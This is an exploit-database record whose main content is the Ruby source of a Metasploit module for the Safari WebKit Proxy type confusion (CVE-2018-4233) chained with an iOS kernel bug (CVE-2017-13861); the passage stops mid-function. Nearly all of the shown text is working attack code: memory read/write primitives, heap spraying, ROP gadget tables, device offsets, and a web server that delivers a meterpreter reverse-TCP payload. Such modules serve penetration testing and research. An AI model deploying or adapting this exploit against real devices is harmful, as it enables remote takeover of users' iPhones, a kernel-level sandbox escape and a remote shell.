"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n 